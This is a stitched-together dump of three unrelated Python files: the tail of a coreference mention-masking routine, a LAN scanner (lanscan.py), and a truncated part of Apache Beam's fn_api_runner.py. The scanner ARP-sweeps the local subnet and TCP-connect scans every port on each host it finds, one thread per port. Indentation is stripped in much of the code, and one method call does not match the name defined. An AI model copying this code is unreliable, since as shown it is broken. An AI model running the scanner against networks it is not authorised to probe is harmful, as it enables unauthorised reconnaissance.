boundaries_textspan = boundaries_sentences[textspan_idx] # boundaries of tokens spanned in the larger text
# find mentions in the textspan
mentions_textspan = []
while mentions_covered < len(mentions) and mentions[mentions_covered][1] <= boundaries_textspan[1]:
mentions_textspan.append(mentions[mentions_covered])
mentions_covered += 1
token_index_in_textspan = 0
while token_index_in_textspan < len(text_span) and token_index < len(
text_span_all): # while considering tokens in the textspan
subtoken_index = t['subtoken_map'][token_index]
if token_index in t['pronouns']:
pronouns_new.append(new_token_index)
masked = False
if idx_next_mention < len(mentions) and token_index == mentions[idx_next_mention][0]:
mention = mentions[idx_next_mention]
if mention[0] in mask_mention_starts and mention not in masked_mentions:
idx_next_mention += 1
continue
if mention in masked_mentions:
prev_subtoken_index = subtoken_index
count_subtokens += 1
text_span_new.append('[MASK]')
speakers_new.append(speakers[token_index_in_textspan])
sentence_map_new.append(t['sentence_map'][token_index])
subtoken_map_new.append(count_subtokens)
map_mentions_to_new_indices[str(mention)] = [new_token_index, new_token_index]
new_token_index += 1
masked = True
current_idx_mention = idx_next_mention
else:
map_mentions_to_new_indices[str(mention)] = [new_token_index,new_token_index + mention[1] - mention[0]]
idx_next_mention += 1
if idx_next_mention < len(mentions):
if not masked and token_index == mentions[idx_next_mention][0]:
continue
elif masked:
while mentions[idx_next_mention][1] <= mentions[current_idx_mention][1]:
idx_next_mention += 1
if not token_index in mask_mention_starts:
if subtoken_index != prev_subtoken_index:
count_subtokens += 1
prev_subtoken_index = subtoken_index
text_span_new.append(text_span[token_index_in_textspan])
speakers_new.append(speakers[token_index_in_textspan])
sentence_map_new.append(t['sentence_map'][token_index])
subtoken_map_new.append(count_subtokens)
new_token_index += 1
token_index += 1
token_index_in_textspan += 1
else:
token_index += mention[1] - mention[0] + 1
token_index_in_textspan += mention[1] - mention[0] + 1
sentences_new_all.append(text_span_new)
speakers_new_all.append(speakers_new)
text_span_all_new += text_span_new
clusters_new = []
for c in t['clusters']:
cluster = []
for m in c:
if str(m) in map_mentions_to_new_indices.keys():
cluster.append(map_mentions_to_new_indices[str(m)])
if cluster != []:
clusters_new.append(cluster)
t_new = t.copy()
try:
    new_masked_mentions = [tuple(map_mentions_to_new_indices[str(m)]) for m in masked_mentions]
except KeyError:
    print(masked_mentions, map_mentions_to_new_indices)
    print(t)
    raise
t_new['masked_mentions'] = new_masked_mentions
t_new['masked_mentions_in_original'] = [tuple(m) for m in masked_mentions]
t_new['clusters'] = clusters_new
t_new['sentences'] = sentences_new_all
t_new['sentence_map'] = sentence_map_new
t_new['pronouns'] = pronouns_new
t_new['speakers'] = speakers_new_all
t_new['subtoken_map'] = subtoken_map_new
new_datapoints.append(t_new)
return new_datapoints
|
lanscan.py
|
import netifaces
from scapy.all import *
import socket
import netaddr
import ipaddress
from tqdm import tqdm
import os
import pandas as pd
import threading
def get_own_ip():
own_ip = netifaces.ifaddresses('en0')[netifaces.AF_INET][0]['addr']
return own_ip
def get_broadcastaddr():
broadcastaddr = netifaces.ifaddresses('en0')[netifaces.AF_INET][0]['broadcast']
return broadcastaddr
def get_netmask():
netmask = netifaces.ifaddresses('en0')[netifaces.AF_INET][0]['netmask']
return netmask
# Compute the network-address portion
# (the interface information gives a host address; we want the network address instead)
def get_networkaddr():
ip=get_own_ip()
netmask=get_netmask()
network_addr = str(netaddr.IPNetwork(ip+'/'+netmask).cidr)
return network_addr
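# For example (hypothetical addresses): with ip '192.168.1.23' and netmask
# '255.255.255.0', netaddr.IPNetwork('192.168.1.23/255.255.255.0').cidr gives
# '192.168.1.0/24'.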
# Look up hostnames for the given IP addresses
def get_hostname(ip_list):
host_list=[]
for ip in ip_list:
try:
    hostname = socket.gethostbyaddr(ip)[0]
    host_list.append(hostname)
except OSError:  # covers socket.herror / socket.gaierror for unresolvable hosts
    host_list.append('None')
return host_list
def port_scan(ip_list):
    ports = []
    for ip in tqdm(ip_list):
        individual_port = []
        for p in tqdm(range(0, 65535)):
            s = socket.socket()
            errno = s.connect_ex((ip, p))
            s.close()
            if errno == 0:
                individual_port.append(p)
        ports.append(individual_port)
    return ports
def port_run(ip):
    scan_range = [1, 65535]
    host = ip
    threads = []
    ports = []
    isopen = []
    individual_port = []
    def Run(port, i):
        con = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        return_code = con.connect_ex((host, port))
        con.close()
        if return_code == 0:
            isopen[i] = 1
    count = 0
    for port in tqdm(range(scan_range[0], scan_range[1])):
        ports.append(port)
        isopen.append(0)
        thread = threading.Thread(target=Run, args=(port, count))
        thread.start()
        threads.append(thread)
        count += 1
    for i in range(len(threads)):
        threads[i].join()
        if isopen[i] == 1:
            individual_port.append(ports[i])
            print('%d open' % ports[i])
    print(individual_port)
    return individual_port
# Look up the IP address, MAC address, hostname and open ports for each host
def get_hostinformation(networkaddr):
ip_list=[]
mac_list=[]
port=[]
for ip in tqdm(netaddr.IPNetwork(networkaddr)):
print(ip)
ip=str(ip)
frame = Ether(dst='ff:ff:ff:ff:ff:ff') / ARP(op=1, pdst = ip)
receive = srp1(frame,timeout=0.1,iface='en0')
if receive is not None:
    mac_list.append(receive[Ether].src)
    ip_list.append(ip)
    print(receive)
host=get_hostname(ip_list)
for ip in tqdm(ip_list):
individual_port=port_run(ip)
port.append(individual_port)
return ip_list,mac_list,host,port
def make_result(ip,mac,host,port):
df=pd.DataFrame()
df['ip']=ip
df['mac']=mac
df['host']=host
df['port']=port
return df
if __name__ == '__main__':
own_ip=get_own_ip()
broadcastaddr = get_broadcastaddr()
netmask = get_netmask()
network_addr = get_networkaddr()
ip,mac,host,port=get_hostinformation(network_addr)
#print(f'ip:{ip}')
#print(f'mac:{mac}')
#print(f'hostname:{host}')
#print(f'port:{port}')
print('-------------------------------------------------------------------------------------------')
print(f'my_ip:{own_ip}')
print(f'broadcast_address:{broadcastaddr}')
print(f'netmask:{netmask}')
print(f'network_address:{network_addr}')
df=make_result(ip,mac,host,port)
print(df)
|
fn_api_runner.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""A PipelineRunner using the SDK harness.
"""
from __future__ import absolute_import
from __future__ import print_function
import collections
import contextlib
import copy
import itertools
import logging
import os
import queue
import subprocess
import sys
import threading
import time
import uuid
from builtins import object
import grpc
import apache_beam as beam # pylint: disable=ungrouped-imports
from apache_beam import coders
from apache_beam.coders.coder_impl import create_InputStream
from apache_beam.coders.coder_impl import create_OutputStream
from apache_beam.metrics import metric
from apache_beam.metrics import monitoring_infos
from apache_beam.metrics.execution import MetricResult
from apache_beam.options import pipeline_options
from apache_beam.options.value_provider import RuntimeValueProvider
from apache_beam.portability import common_urns
from apache_beam.portability import python_urns
from apache_beam.portability.api import beam_artifact_api_pb2
from apache_beam.portability.api import beam_artifact_api_pb2_grpc
from apache_beam.portability.api import beam_fn_api_pb2
from apache_beam.portability.api import beam_fn_api_pb2_grpc
from apache_beam.portability.api import beam_provision_api_pb2
from apache_beam.portability.api import beam_provision_api_pb2_grpc
from apache_beam.portability.api import beam_runner_api_pb2
from apache_beam.portability.api import endpoints_pb2
from apache_beam.runners import pipeline_context
from apache_beam.runners import runner
from apache_beam.runners.portability import artifact_service
from apache_beam.runners.portability import fn_api_runner_transforms
from apache_beam.runners.portability import portable_metrics
from apache_beam.runners.portability.fn_api_runner_transforms import create_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import only_element
from apache_beam.runners.portability.fn_api_runner_transforms import split_buffer_id
from apache_beam.runners.portability.fn_api_runner_transforms import unique_name
from apache_beam.runners.worker import bundle_processor
from apache_beam.runners.worker import data_plane
from apache_beam.runners.worker import sdk_worker
from apache_beam.runners.worker.channel_factory import GRPCChannelFactory
from apache_beam.runners.worker.sdk_worker import _Future
from apache_beam.runners.worker.statecache import StateCache
from apache_beam.transforms import environments
from apache_beam.transforms import trigger
from apache_beam.transforms.window import GlobalWindow
from apache_beam.transforms.window import GlobalWindows
from apache_beam.utils import profiler
from apache_beam.utils import proto_utils
from apache_beam.utils import windowed_value
from apache_beam.utils.thread_pool_executor import UnboundedThreadPoolExecutor
# This module is experimental. No backwards-compatibility guarantees.
ENCODED_IMPULSE_VALUE = beam.coders.WindowedValueCoder(
beam.coders.BytesCoder(),
beam.coders.coders.GlobalWindowCoder()).get_impl().encode_nested(
beam.transforms.window.GlobalWindows.windowed_value(b''))
# State caching is enabled in the fn_api_runner for testing, except for one
# test which runs without state caching (FnApiRunnerTestWithDisabledCaching).
# The cache is disabled in production for other runners.
STATE_CACHE_SIZE = 100
_LOGGER = logging.getLogger(__name__)
class ControlConnection(object):
_uid_counter = 0
_lock = threading.Lock()
def __init__(self):
self._push_queue = queue.Queue()
self._input = None
self._futures_by_id = dict()
self._read_thread = threading.Thread(
name='beam_control_read', target=self._read)
self._state = BeamFnControlServicer.UNSTARTED_STATE
def _read(self):
for data in self._input:
self._futures_by_id.pop(data.instruction_id).set(data)
def push(self, req):
if req == BeamFnControlServicer._DONE_MARKER:
self._push_queue.put(req)
return None
if not req.instruction_id:
with ControlConnection._lock:
ControlConnection._uid_counter += 1
req.instruction_id = 'control_%s' % ControlConnection._uid_counter
future = ControlFuture(req.instruction_id)
self._futures_by_id[req.instruction_id] = future
self._push_queue.put(req)
return future
def get_req(self):
return self._push_queue.get()
def set_input(self, input):
with ControlConnection._lock:
if self._input:
raise RuntimeError('input is already set.')
self._input = input
self._read_thread.start()
self._state = BeamFnControlServicer.STARTED_STATE
def close(self):
with ControlConnection._lock:
if self._state == BeamFnControlServicer.STARTED_STATE:
self.push(BeamFnControlServicer._DONE_MARKER)
self._read_thread.join()
self._state = BeamFnControlServicer.DONE_STATE
class BeamFnControlServicer(beam_fn_api_pb2_grpc.BeamFnControlServicer):
"""Implementation of BeamFnControlServicer for clients."""
UNSTARTED_STATE = 'unstarted'
STARTED_STATE = 'started'
DONE_STATE = 'done'
_DONE_MARKER = object()
def __init__(self):
self._lock = threading.Lock()
self._uid_counter = 0
self._state = self.UNSTARTED_STATE
# following self._req_* variables are used for debugging purpose, data is
# added only when self._log_req is True.
self._req_sent = collections.defaultdict(int)
self._req_worker_mapping = {}
self._log_req = logging.getLogger().getEffectiveLevel() <= logging.DEBUG
self._connections_by_worker_id = collections.defaultdict(ControlConnection)
def get_conn_by_worker_id(self, worker_id):
with self._lock:
return self._connections_by_worker_id[worker_id]
def Control(self, iterator, context):
with self._lock:
if self._state == self.DONE_STATE:
return
else:
self._state = self.STARTED_STATE
worker_id = dict(context.invocation_metadata()).get('worker_id')
if not worker_id:
raise RuntimeError('All workers communicating through gRPC should have '
                   'a worker_id; received None.')
control_conn = self.get_conn_by_worker_id(worker_id)
control_conn.set_input(iterator)
while True:
to_push = control_conn.get_req()
if to_push is self._DONE_MARKER:
return
yield to_push
if self._log_req:
self._req_sent[to_push.instruction_id] += 1
def done(self):
self._state = self.DONE_STATE
_LOGGER.debug('Runner: Requests sent by runner: %s',
[(str(req), cnt) for req, cnt in self._req_sent.items()])
_LOGGER.debug('Runner: Requests multiplexing info: %s',
[(str(req), worker) for req, worker
in self._req_worker_mapping.items()])
class _ListBuffer(list):
"""Used to support parititioning of a list."""
def partition(self, n):
return [self[k::n] for k in range(n)]
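# For example, _ListBuffer([0, 1, 2, 3, 4]).partition(2) round-robins the
# elements into [[0, 2, 4], [1, 3]].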
class _GroupingBuffer(object):
"""Used to accumulate groupded (shuffled) results."""
def __init__(self, pre_grouped_coder, post_grouped_coder, windowing):
self._key_coder = pre_grouped_coder.key_coder()
self._pre_grouped_coder = pre_grouped_coder
self._post_grouped_coder = post_grouped_coder
self._table = collections.defaultdict(list)
self._windowing = windowing
self._grouped_output = None
def append(self, elements_data):
if self._grouped_output:
raise RuntimeError('Grouping table append after read.')
input_stream = create_InputStream(elements_data)
coder_impl = self._pre_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
# TODO(robertwb): We could optimize this even more by using a
# window-dropping coder for the data plane.
is_trivial_windowing = self._windowing.is_default()
while input_stream.size() > 0:
windowed_key_value = coder_impl.decode_from_stream(input_stream, True)
key, value = windowed_key_value.value
self._table[key_coder_impl.encode(key)].append(
value if is_trivial_windowing
else windowed_key_value.with_value(value))
def partition(self, n):
""" It is used to partition _GroupingBuffer to N parts. Once it is
partitioned, it would not be re-partitioned with diff N. Re-partition
is not supported now.
"""
if not self._grouped_output:
if self._windowing.is_default():
globally_window = GlobalWindows.windowed_value(
None,
timestamp=GlobalWindow().max_timestamp(),
pane_info=windowed_value.PaneInfo(
is_first=True,
is_last=True,
timing=windowed_value.PaneInfoTiming.ON_TIME,
index=0,
nonspeculative_index=0)).with_value
windowed_key_values = lambda key, values: [
globally_window((key, values))]
else:
# TODO(pabloem, BEAM-7514): Trigger driver needs access to the clock
# note that this only comes through if windowing is default - but what
# about having multiple firings on the global window.
# May need to revise.
trigger_driver = trigger.create_trigger_driver(self._windowing, True)
windowed_key_values = trigger_driver.process_entire_key
coder_impl = self._post_grouped_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
self._grouped_output = [[] for _ in range(n)]
output_stream_list = []
for _ in range(n):
output_stream_list.append(create_OutputStream())
for idx, (encoded_key, windowed_values) in enumerate(self._table.items()):
key = key_coder_impl.decode(encoded_key)
for wkvs in windowed_key_values(key, windowed_values):
coder_impl.encode_to_stream(wkvs, output_stream_list[idx % n], True)
for ix, output_stream in enumerate(output_stream_list):
self._grouped_output[ix] = [output_stream.get()]
self._table = None
return self._grouped_output
def __iter__(self):
""" Since partition() returns a list of lists, add this __iter__ to return
a list to simplify code when we need to iterate through ALL elements of
_GroupingBuffer.
"""
return itertools.chain(*self.partition(1))
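# Rough usage sketch: append() is fed encoded windowed key/value elements and
# accumulates values per encoded key; partition(n) then assigns whole key
# groups to n output shards (by table order, index modulo n) and re-encodes
# each shard with the post-GBK coder.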
class _WindowGroupingBuffer(object):
"""Used to partition windowed side inputs."""
def __init__(self, access_pattern, coder):
# Here's where we would use a different type of partitioning
# (e.g. also by key) for a different access pattern.
if access_pattern.urn == common_urns.side_inputs.ITERABLE.urn:
self._kv_extrator = lambda value: ('', value)
self._key_coder = coders.SingletonCoder('')
self._value_coder = coder.wrapped_value_coder
elif access_pattern.urn == common_urns.side_inputs.MULTIMAP.urn:
self._kv_extrator = lambda value: value
self._key_coder = coder.wrapped_value_coder.key_coder()
self._value_coder = (
coder.wrapped_value_coder.value_coder())
else:
raise ValueError(
"Unknown access pattern: '%s'" % access_pattern.urn)
self._windowed_value_coder = coder
self._window_coder = coder.window_coder
self._values_by_window = collections.defaultdict(list)
def append(self, elements_data):
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_value = self._windowed_value_coder.get_impl(
).decode_from_stream(input_stream, True)
key, value = self._kv_extrator(windowed_value.value)
for window in windowed_value.windows:
self._values_by_window[key, window].append(value)
def encoded_items(self):
value_coder_impl = self._value_coder.get_impl()
key_coder_impl = self._key_coder.get_impl()
for (key, window), values in self._values_by_window.items():
encoded_window = self._window_coder.encode(window)
encoded_key = key_coder_impl.encode_nested(key)
output_stream = create_OutputStream()
for value in values:
value_coder_impl.encode_to_stream(value, output_stream, True)
yield encoded_key, encoded_window, output_stream.get()
class FnApiRunner(runner.PipelineRunner):
def __init__(
self,
default_environment=None,
bundle_repeat=0,
use_state_iterables=False,
provision_info=None,
progress_request_frequency=None):
"""Creates a new Fn API Runner.
Args:
default_environment: the default environment to use for UserFns.
bundle_repeat: replay every bundle this many extra times, for profiling
and debugging
use_state_iterables: Intentionally split gbk iterables over state API
(for testing)
provision_info: provisioning info to make available to workers, or None
progress_request_frequency: The frequency (in seconds) that the runner
waits before requesting progress from the SDK.
"""
super(FnApiRunner, self).__init__()
self._last_uid = -1
self._default_environment = (
default_environment
or environments.EmbeddedPythonEnvironment())
self._bundle_repeat = bundle_repeat
self._num_workers = 1
self._progress_frequency = progress_request_frequency
self._profiler_factory = None
self._use_state_iterables = use_state_iterables
self._provision_info = provision_info or ExtendedProvisionInfo(
beam_provision_api_pb2.ProvisionInfo(
job_id='unknown-job-id',
job_name='unknown-job-name',
retrieval_token='unused-retrieval-token'))
def _next_uid(self):
self._last_uid += 1
return str(self._last_uid)
def run_pipeline(self, pipeline, options):
RuntimeValueProvider.set_runtime_options({})
# Setup "beam_fn_api" experiment options if lacked.
experiments = (options.view_as(pipeline_options.DebugOptions).experiments
or [])
if 'beam_fn_api' not in experiments:
experiments.append('beam_fn_api')
options.view_as(pipeline_options.DebugOptions).experiments = experiments
# This is sometimes needed if type checking is disabled
# to enforce that the inputs (and outputs) of GroupByKey operations
# are known to be KVs.
from apache_beam.runners.dataflow.dataflow_runner import DataflowRunner
# TODO: Move group_by_key_input_visitor() to a non-dataflow specific file.
pipeline.visit(DataflowRunner.group_by_key_input_visitor())
self._bundle_repeat = self._bundle_repeat or options.view_as(
pipeline_options.DirectOptions).direct_runner_bundle_repeat
self._num_workers = options.view_as(
pipeline_options.DirectOptions).direct_num_workers or self._num_workers
self._profiler_factory = profiler.Profile.factory_from_options(
options.view_as(pipeline_options.ProfilingOptions))
if 'use_sdf_bounded_source' in experiments:
pipeline.replace_all(DataflowRunner._SDF_PTRANSFORM_OVERRIDES)
self._latest_run_result = self.run_via_runner_api(pipeline.to_runner_api(
default_environment=self._default_environment))
return self._latest_run_result
def run_via_runner_api(self, pipeline_proto):
stage_context, stages = self.create_stages(pipeline_proto)
# TODO(pabloem, BEAM-7514): Create a watermark manager (that has access to
# the teststream (if any), and all the stages).
return self.run_stages(stage_context, stages)
@contextlib.contextmanager
def maybe_profile(self):
if self._profiler_factory:
try:
profile_id = 'direct-' + subprocess.check_output(
['git', 'rev-parse', '--abbrev-ref', 'HEAD']
).decode(errors='ignore').strip()
except subprocess.CalledProcessError:
profile_id = 'direct-unknown'
profiler = self._profiler_factory(profile_id, time_prefix='')
else:
profiler = None
if profiler:
with profiler:
yield
if not self._bundle_repeat:
_LOGGER.warning(
'The --direct_runner_bundle_repeat option is not set; '
'a significant portion of the profile may be one-time overhead.')
path = profiler.profile_output
print('CPU Profile written to %s' % path)
try:
import gprof2dot # pylint: disable=unused-import
if not subprocess.call([
sys.executable, '-m', 'gprof2dot',
'-f', 'pstats', path, '-o', path + '.dot']):
if not subprocess.call(
['dot', '-Tsvg', '-o', path + '.svg', path + '.dot']):
print('CPU Profile rendering at file://%s.svg'
% os.path.abspath(path))
except ImportError:
# pylint: disable=superfluous-parens
print('Please install gprof2dot and dot for profile renderings.')
else:
# Empty context.
yield
def create_stages(self, pipeline_proto):
return fn_api_runner_transforms.create_and_optimize_stages(
copy.deepcopy(pipeline_proto),
phases=[fn_api_runner_transforms.annotate_downstream_side_inputs,
fn_api_runner_transforms.fix_side_input_pcoll_coders,
fn_api_runner_transforms.lift_combiners,
fn_api_runner_transforms.expand_sdf,
fn_api_runner_transforms.expand_gbk,
fn_api_runner_transforms.sink_flattens,
fn_api_runner_transforms.greedily_fuse,
fn_api_runner_transforms.read_to_impulse,
fn_api_runner_transforms.impulse_to_input,
fn_api_runner_transforms.inject_timer_pcollections,
fn_api_runner_transforms.sort_stages,
fn_api_runner_transforms.window_pcollection_coders],
known_runner_urns=frozenset([
common_urns.primitives.FLATTEN.urn,
common_urns.primitives.GROUP_BY_KEY.urn]),
use_state_iterables=self._use_state_iterables)
def run_stages(self, stage_context, stages):
"""Run a list of topologically-sorted stages in batch mode.
Args:
stage_context (fn_api_runner_transforms.TransformContext)
stages (list[fn_api_runner_transforms.Stage])
"""
worker_handler_manager = WorkerHandlerManager(
stage_context.components.environments, self._provision_info)
metrics_by_stage = {}
monitoring_infos_by_stage = {}
try:
with self.maybe_profile():
pcoll_buffers = collections.defaultdict(_ListBuffer)
for stage in stages:
stage_results = self._run_stage(
worker_handler_manager.get_worker_handlers,
stage_context.components,
stage,
pcoll_buffers,
stage_context.safe_coders)
metrics_by_stage[stage.name] = stage_results.process_bundle.metrics
monitoring_infos_by_stage[stage.name] = (
stage_results.process_bundle.monitoring_infos)
finally:
worker_handler_manager.close_all()
return RunnerResult(
runner.PipelineState.DONE, monitoring_infos_by_stage, metrics_by_stage)
def _store_side_inputs_in_state(self,
worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders):
for (transform_id, tag), (buffer_id, si) in data_side_input.items():
_, pcoll_id = split_buffer_id(buffer_id)
value_coder = context.coders[safe_coders[
pipeline_components.pcollections[pcoll_id].coder_id]]
elements_by_window = _WindowGroupingBuffer(si, value_coder)
for element_data in pcoll_buffers[buffer_id]:
elements_by_window.append(element_data)
for key, window, elements_data in elements_by_window.encoded_items():
state_key = beam_fn_api_pb2.StateKey(
multimap_side_input=beam_fn_api_pb2.StateKey.MultimapSideInput(
transform_id=transform_id,
side_input_id=tag,
window=window,
key=key))
worker_handler.state.append_raw(state_key, elements_data)
def _run_bundle_multiple_times_for_testing(
self, worker_handler_list, process_bundle_descriptor, data_input,
data_output, get_input_coder_callable, cache_token_generator):
# all workers share state, so use any worker_handler.
worker_handler = worker_handler_list[0]
for k in range(self._bundle_repeat):
try:
worker_handler.state.checkpoint()
testing_bundle_manager = ParallelBundleManager(
worker_handler_list, lambda pcoll_id: [],
get_input_coder_callable, process_bundle_descriptor,
self._progress_frequency, k,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator
)
testing_bundle_manager.process_bundle(data_input, data_output)
finally:
worker_handler.state.restore()
def _collect_written_timers_and_add_to_deferred_inputs(self,
context,
pipeline_components,
stage,
get_buffer_callable,
deferred_inputs):
for transform_id, timer_writes in stage.timer_pcollections:
# Queue any set timers as new inputs.
windowed_timer_coder_impl = context.coders[
pipeline_components.pcollections[timer_writes].coder_id].get_impl()
written_timers = get_buffer_callable(
create_buffer_id(timer_writes, kind='timers'))
if written_timers:
# Keep only the "last" timer set per key and window.
timers_by_key_and_window = {}
for elements_data in written_timers:
input_stream = create_InputStream(elements_data)
while input_stream.size() > 0:
windowed_key_timer = windowed_timer_coder_impl.decode_from_stream(
input_stream, True)
key, _ = windowed_key_timer.value
# TODO: Explode and merge windows.
assert len(windowed_key_timer.windows) == 1
timers_by_key_and_window[
key, windowed_key_timer.windows[0]] = windowed_key_timer
out = create_OutputStream()
for windowed_key_timer in timers_by_key_and_window.values():
windowed_timer_coder_impl.encode_to_stream(
windowed_key_timer, out, True)
deferred_inputs[transform_id] = _ListBuffer([out.get()])
written_timers[:] = []
def _add_residuals_and_channel_splits_to_deferred_inputs(
self, splits, get_input_coder_callable,
input_for_callable, last_sent, deferred_inputs):
prev_stops = {}
for split in splits:
for delayed_application in split.residual_roots:
deferred_inputs[
input_for_callable(
delayed_application.application.transform_id,
delayed_application.application.input_id)
].append(delayed_application.application.element)
for channel_split in split.channel_splits:
coder_impl = get_input_coder_callable(channel_split.transform_id)
        # TODO(SDF): This requires deterministic ordering of buffer iteration.
# TODO(SDF): The return split is in terms of indices. Ideally,
# a runner could map these back to actual positions to effectively
# describe the two "halves" of the now-split range. Even if we have
# to buffer each element we send (or at the very least a bit of
# metadata, like position, about each of them) this should be doable
# if they're already in memory and we are bounding the buffer size
# (e.g. to 10mb plus whatever is eagerly read from the SDK). In the
# case of non-split-points, we can either immediately replay the
# "non-split-position" elements or record them as we do the other
# delayed applications.
# Decode and recode to split the encoded buffer by element index.
all_elements = list(coder_impl.decode_all(b''.join(last_sent[
channel_split.transform_id])))
residual_elements = all_elements[
channel_split.first_residual_element : prev_stops.get(
channel_split.transform_id, len(all_elements)) + 1]
if residual_elements:
deferred_inputs[channel_split.transform_id].append(
coder_impl.encode_all(residual_elements))
prev_stops[
channel_split.transform_id] = channel_split.last_primary_element
@staticmethod
def _extract_stage_data_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers):
# Returns maps of transform names to PCollection identifiers.
# Also mutates IO stages to point to the data ApiServiceDescriptor.
data_input = {}
data_side_input = {}
data_output = {}
for transform in stage.transforms:
if transform.spec.urn in (bundle_processor.DATA_INPUT_URN,
bundle_processor.DATA_OUTPUT_URN):
pcoll_id = transform.spec.payload
if transform.spec.urn == bundle_processor.DATA_INPUT_URN:
target = transform.unique_name, only_element(transform.outputs)
if pcoll_id == fn_api_runner_transforms.IMPULSE_BUFFER:
data_input[target] = _ListBuffer([ENCODED_IMPULSE_VALUE])
else:
data_input[target] = pcoll_buffers[pcoll_id]
coder_id = pipeline_components.pcollections[
only_element(transform.outputs.values())].coder_id
elif transform.spec.urn == bundle_processor.DATA_OUTPUT_URN:
target = transform.unique_name, only_element(transform.inputs)
data_output[target] = pcoll_id
coder_id = pipeline_components.pcollections[
only_element(transform.inputs.values())].coder_id
else:
raise NotImplementedError
data_spec = beam_fn_api_pb2.RemoteGrpcPort(coder_id=coder_id)
if data_api_service_descriptor:
data_spec.api_service_descriptor.url = (
data_api_service_descriptor.url)
transform.spec.payload = data_spec.SerializeToString()
elif transform.spec.urn in fn_api_runner_transforms.PAR_DO_URNS:
payload = proto_utils.parse_Bytes(
transform.spec.payload, beam_runner_api_pb2.ParDoPayload)
for tag, si in payload.side_inputs.items():
data_side_input[transform.unique_name, tag] = (
create_buffer_id(transform.inputs[tag]), si.access_pattern)
return data_input, data_side_input, data_output
def _run_stage(self,
worker_handler_factory,
pipeline_components,
stage,
pcoll_buffers,
safe_coders):
"""Run an individual stage.
Args:
worker_handler_factory: A ``callable`` that takes in an environment, and
returns a ``WorkerHandler`` class.
pipeline_components (beam_runner_api_pb2.Components): TODO
stage (fn_api_runner_transforms.Stage)
pcoll_buffers (collections.defaultdict of str: list): Mapping of
PCollection IDs to list that functions as buffer for the
``beam.PCollection``.
safe_coders (dict): TODO
"""
def iterable_state_write(values, element_coder_impl):
token = unique_name(None, 'iter').encode('ascii')
out = create_OutputStream()
for element in values:
element_coder_impl.encode_to_stream(element, out, True)
worker_handler.state.append_raw(
beam_fn_api_pb2.StateKey(
runner=beam_fn_api_pb2.StateKey.Runner(key=token)),
out.get())
return token
worker_handler_list = worker_handler_factory(
stage.environment, self._num_workers)
    # All worker_handlers share the same grpc server, so we can read grpc
    # server info from any of them; here we simply use the first one.
worker_handler = next(iter(worker_handler_list))
context = pipeline_context.PipelineContext(
pipeline_components, iterable_state_write=iterable_state_write)
data_api_service_descriptor = worker_handler.data_api_service_descriptor()
_LOGGER.info('Running %s', stage.name)
data_input, data_side_input, data_output = self._extract_endpoints(
stage, pipeline_components, data_api_service_descriptor, pcoll_buffers)
process_bundle_descriptor = beam_fn_api_pb2.ProcessBundleDescriptor(
id=self._next_uid(),
transforms={transform.unique_name: transform
for transform in stage.transforms},
pcollections=dict(pipeline_components.pcollections.items()),
coders=dict(pipeline_components.coders.items()),
windowing_strategies=dict(
pipeline_components.windowing_strategies.items()),
environments=dict(pipeline_components.environments.items()))
if worker_handler.state_api_service_descriptor():
process_bundle_descriptor.state_api_service_descriptor.url = (
worker_handler.state_api_service_descriptor().url)
# Store the required side inputs into state so it is accessible for the
# worker when it runs this bundle.
self._store_side_inputs_in_state(worker_handler,
context,
pipeline_components,
data_side_input,
pcoll_buffers,
safe_coders)
def get_buffer(buffer_id):
"""Returns the buffer for a given (operation_type, PCollection ID).
For grouping-typed operations, we produce a ``_GroupingBuffer``. For
others, we produce a ``_ListBuffer``.
"""
kind, name = split_buffer_id(buffer_id)
if kind in ('materialize', 'timers'):
# If `buffer_id` is not a key in `pcoll_buffers`, it will be added by
# the `defaultdict`.
return pcoll_buffers[buffer_id]
elif kind == 'group':
# This is a grouping write, create a grouping buffer if needed.
if buffer_id not in pcoll_buffers:
original_gbk_transform = name
transform_proto = pipeline_components.transforms[
original_gbk_transform]
input_pcoll = only_element(list(transform_proto.inputs.values()))
output_pcoll = only_element(list(transform_proto.outputs.values()))
pre_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[input_pcoll].coder_id]]
post_gbk_coder = context.coders[safe_coders[
pipeline_components.pcollections[output_pcoll].coder_id]]
windowing_strategy = context.windowing_strategies[
pipeline_components
.pcollections[output_pcoll].windowing_strategy_id]
pcoll_buffers[buffer_id] = _GroupingBuffer(
pre_gbk_coder, post_gbk_coder, windowing_strategy)
else:
# These should be the only two identifiers we produce for now,
# but special side input writes may go here.
raise NotImplementedError(buffer_id)
return pcoll_buffers[buffer_id]
def get_input_coder_impl(transform_id):
return context.coders[safe_coders[
beam_fn_api_pb2.RemoteGrpcPort.FromString(
process_bundle_descriptor.transforms[transform_id].spec.payload
).coder_id
]].get_impl()
# Change cache token across bundle repeats
cache_token_generator = FnApiRunner.get_cache_token_generator(static=False)
self._run_bundle_multiple_times_for_testing(
worker_handler_list, process_bundle_descriptor, data_input, data_output,
get_input_coder_impl, cache_token_generator=cache_token_generator)
bundle_manager = ParallelBundleManager(
worker_handler_list, get_buffer, get_input_coder_impl,
process_bundle_descriptor, self._progress_frequency,
num_workers=self._num_workers,
cache_token_generator=cache_token_generator)
result, splits = bundle_manager.process_bundle(data_input, data_output)
def input_for(transform_id, input_id):
input_pcoll = process_bundle_descriptor.transforms[
transform_id].inputs[input_id]
for read_id, proto in process_bundle_descriptor.transforms.items():
if (proto.spec.urn == bundle_processor.DATA_INPUT_URN
and input_pcoll in proto.outputs.values()):
return read_id
raise RuntimeError(
'No IO transform feeds %s' % transform_id)
last_result = result
last_sent = data_input
while True:
deferred_inputs = collections.defaultdict(_ListBuffer)
self._collect_written_timers_and_add_to_deferred_inputs(
